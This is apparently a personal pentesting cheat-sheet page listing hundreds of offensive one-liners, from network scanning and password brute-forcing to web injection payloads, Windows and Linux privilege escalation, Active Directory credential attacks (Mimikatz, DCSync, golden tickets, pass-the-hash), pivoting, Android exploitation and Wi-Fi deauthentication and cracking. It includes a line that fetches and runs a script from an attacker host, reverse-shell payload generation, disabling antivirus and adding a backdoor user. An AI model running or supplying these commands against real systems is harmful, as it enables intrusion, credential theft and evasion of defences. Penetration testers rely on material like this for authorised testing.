nmap -sV --script=banner target
Personal large collection of pentesting commands, techniques and one-liners. Filter by category, OS, or search.
nmap -sV --script=banner target
ip a s
host google.com
nslookup google.com
dnsrecon -d hackersploit.org
dnsenum google.com
droopescan scan drupal -u target
enum4linux -a target
hydra -L users -P pass target ftp
feroxbuster -u target
fierce --domain google.com
gobuster dir -u target -w wordlist
nmap -sV --script=http-enum target
ldapsearch -x -H ldap://target -s base
mysql -u root -p -h target
nbtscan target
nmap -sn 192.168.2.0/24
nikto -h target
nmap -Pn -F -sV -O -sC target
nmap -sT -sV -A target
nmap -Pn -sA -p443,3389 target
nmap --script=mongodb-info target
nmap -oN test.txt target
hydra rdp://target
redis-cli -h target
nmap -sV -p 445 --script "smb*" target
smbclient -L //target -U user
smbmap -H target -u user -p pass
nc -nvvv target 25
snmpwalk -v 1 -c public target
hydra -L users -P pass target ssh
ffuf -u http://target/ -H "Host FUZZ.target"
sublist3r -d hackersploit.org
wafw00f hackersploit.org
whois hackersploit.org
wpscan --url target
wfuzz -c -z file,wordlist --hc 404 url/FUZZ
whatweb hackersploit.org
crackmapexec winrm target -u user -p pass
dig -t any google.com
rpcclient -U "" -N target
theHarvester -d google.com -b all
nc -nvlp 1234
ls -la /usr/share/webshells
crackmapexec smb target -u users -p pass --continue-on-success
ssh-keygen
curl --upload-file shell.php target/uploads/
hashcat -a 0 -m mode hashes.txt wordlist
hydra http-get /manager/
hydra http-form-post target
kerbrute passwordspray -d domain users.txt password
john --wordlist=rockyou.txt hashes.txt
curl with poisoned User-Agent then include log
curl 'target/page=php://filter/convert.base64-encode/resource=admin.php'
cat - background.jpg > evil.jpg
curl 'target/page.php?file=../../../../etc/passwd'
manual checklist
impacket-mssqlclient user:pass@target -windows-auth
xp_dirtree \\attacker\share
search type:exploit name:keyword
msfconsole use exploit/multi/handler
' UNION SELECT 1,2,3 #
<?php phpinfo(); ?>
patator http_fuzz url=target user_pass=user:FILE0
hydra -l user -P pass target smb
' OR '1'='1
python3 -c 'import pty;pty.spawn("/bin/bash")'
nmap --script=http-shellshock target
msfconsole use scanner/http/tomcat_mgr_login
wmap_run -t
cadaver http://target/webdav
malicious.js
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe -o shell.exe
net user hacker password123 /add
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Get-Service AppIDSvc
./linpeas.sh
SharpChromium.exe / firefox_decrypt.py
cat /etc/crontab
Set-MpPreference -DisableRealtimeMonitoring $true
GodPotato.exe -cmd cmd.exe
type payload.exe > windowslog.txt:winpeas.exe
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1
.\JuicyPotato.exe -t * -p shell.bat -l 1337 -c "{CLSID}"
getcap -r / 2>/dev/null
gcc -pthread exploit.c -o exploit -lcrypt
ss -anp
ps aux
uname -a
use post/multi/recon/local_exploit_suggester
select sys_eval("cp /bin/bash /var/tmp/bash; chmod u+s /var/tmp/bash");
cat /etc/exports
export PATH=/tmp:$PATH
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker/PowerUp.ps1');Invoke-AllChecks
powershell -ep bypass . \\share\CVE-2021-1675.ps1;Invoke-Nightmare
.\PrintSpoofer64.exe -i -c cmd
./cve-2021-4034-poc
find / -perm -u=s -type f 2>/dev/null
schtasks /query /fo LIST /v
reg save hklm\sam c:\Temp\sam
services
icacls "C:\path\to\service.exe"
Procmon64.exe (Filter for NAME NOT FOUND on .dll)
sudo -l
sudo nmap --script=/tmp/root.nse
.\SweetPotato.exe -p test.bat
.\Akagi64.exe 23 C:\Temp\backdoor.exe
type C:\Windows\Panther\Unattend.xml
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
post/windows/gather/credentials/vnc
findstr /si password *.txt *.xml *.ini
./windows-exploit-suggester.py --database 2021-12-26-mssb.xls --systeminfo systeminfo.txt
ipconfig /all
whoami /priv
tasklist /SVC
openssl passwd w00t
find / -writable -type d 2>/dev/null
impacket-smbserver share ./ -smb2support
./pspy64
.\winPEAS.exe
Get-ObjectAcl -Identity user
net users /domain
crackmapexec smb target -u users.txt -p 'Pass!' --continue-on-success
python3 username-generate.py -u names.txt -o generated_users.txt
PowerShell reflection trick
impacket-GetNPUsers domain/ -dc-ip target -usersfile users.txt
docker-compose up -d
net group "Domain Admins" /domain
certipy-ad find -u user -p pass -dc-ip target -vulnerable
crackmapexec smb target -u user -p pass --rid-brute
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
lsadump::dcsync /user:domain\user
net accounts
Find-DomainShare -CheckShareAccess
gpp-decrypt 'cpassword'
kerberos::golden /user:user /domain:domain /sid:SID /krbtgt:hash /ptt
netexec smb target -u users.txt -H hashes.txt --continue-on-success
. .\HostRecon.ps1; Invoke-HostRecon
impacket-GetUserSPNs -request domain/user:pass -dc-ip target
kerbrute userenum -d domain --dc target wordlist
sekurlsa::logonpasswords
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
netexec smb target -u user -p pass --sam
sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:powershell
impacket-psexec -hashes :NTHASH user@target
kerberos::ptt ticket.kirbi
Invoke-UserHunter
Import-Module .\PowerView.ps1
PsExec64.exe \\target -u domain\user -p pass cmd
responder -I eth0 -wpad -v
.\Rubeus.exe kerberoast /outfile:hashes.txt
proxychains python3 scshell.py user@target
impacket-lookupsid anonymous@target
msfconsole use exploit/windows/smb/smb_relay
Get-NetUser -SPN
reg save hklm\sam c:\Temp\sam
Invoke-BloodHound -CollectionMethod All
kerberos::golden /sid:SID /domain:domain /target:host /service:svc /rc4:hash /user:user /ptt
.\StandIn.exe --gpo --filter "Default Domain Policy" --localadmin user
winrs -r:host -u:user -p:pass cmd
python3 cve-2020-1472-exploit.py 'DC$' DC-IP
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "<encoded payload>"
.\GMSAPasswordReader.exe --AccountName svc_apache
impacket-secretsdump -just-dc-ntlm domain/user@target
ldapsearch -x -H ldap://target -D 'user' -w 'pass' -b 'DC=domain,DC=local'
python3 windapsearch.py --dc-ip target -U --full
chisel client kali:port R:socks
dnscat2-server domain
proxychains ssh -N -D 1081 user@hop2
base64 file > file.b64
interface_add_route --name ligolo --route subnet
run autoroute -s subnet
portfwd add -l localport -p remoteport -r remotehost
netsh interface portproxy add v4tov4
plink.exe -ssh -l user -pw pass -R port:host:port attacker
proxychains nmap target
sekurlsa::pth /run:"mstsc.exe /restrictedadmin"
ssh -N -D port user@pivot
ssh -N -L localport:dest:destport user@pivot
ssh -N -R port user@kali
ssh -N -R kalilisten:dest:destport user@kali
socat TCP-LISTEN:port,fork TCP:dest:port
net view 10.4.26.4
sudo systemctl start rinetd
sshuttle -r user@pivot subnet
aapt dump badging app.apk
adb devices
apktool d target_app.apk -o output_apktool
apktool d AppName.apk
androguard analyze appka.apk
set payload android/meterpreter/reverse_tcp
bash script
adb shell input tap 760 745
adb bugreport
Burp Proxy Listeners
https://crt.sh/
apk-mitm AndroGoat.apk
dexdump -d classes.dex
jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=55555
adb shell am start -a android.intent.action.VIEW "allsafe://infosecadventures/congrats"
drozer run
drozer console connect
frida -U -f com.target.app -l analysis_script.js
frida -U -f infosecadventures.allsafe -l Intercept_Android_APK_Crypto_Operations.js
frida -U -f infosecadventures.allsafe -l secureflag.js
frida -U 4463 -l root_bypass.js
frida -U -f com.target.app --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida
adb push frida-server-17.2.16-android-arm64 /data/local/tmp/frida-server
msfvenom -p android/meterpreter/reverse_tcp
keytool -genkeypair
grep -r -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" temp_analysis/
adb shell am broadcast
cd shared_prefs
adb shell am startservice infosecadventures.allsafe/.challenges.RecorderService
adb shell am start -W -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/web?url=http://192.168.1.14:9090/test.html"
https://www.jwt.io/
adb logcat
sudo docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf
d2j-apk-sign new_malware.apk
adb install-multiple *.apk
adb push C:\Users\user\Desktop\user.dat /sdcard/Android/data/infosecadventures.allsafe/files/
adb shell pm list packages
adb shell settings put global http_proxy <host-ip>:8080
adb shell screencap -p /data/local/tmp/test1.png
%'/**/OR/**/1=1--
sqlite3 database.db
msfconsole search type:exploit platform:android
apksigner sign --ks my-release-key.jks --in demo_malware.apk --out demo_malware2.apk
arpspoof -i wlan0 -t [target ip] [router ip] -r
besside-ng --bssid <router_MAC> --channel 10 wlan1
sudo bettercap -iface wlan0
airodump-ng --bssid aa:bb:cc:dd:ee:ff -c 4 -w capture wlan1
sudo wifite
wifi.deauth ff:ff:ff:ff:ff:ff
sudo ./fluxion.sh
sudo tcpdump -i eth0 -w packets.pcap
macchanger -a wlan1
aireplay-ng --deauth 0 -a <BSSID of ROUTER> -c <STATION BSSID> -i wlan1
sudo hostapd-mana NinjaWiFi-mana.conf
echo 1 > /proc/sys/net/ipv4/ip_forward
sudo aireplay-ng -9 -e ninja-wifi -a 14:15:BS:14:BS:15 wlan0mon
sudo kismet -c wlan0 --no-ncurses
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sudo netdiscover
airmon-ng check
service network-manager restart
sudo airmon-ng start wlan0
driftnet -i eth0
airodump-ng -w dump wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt -e networkname -b BS:ID:BS:ID:BS:ID wpa-01.cap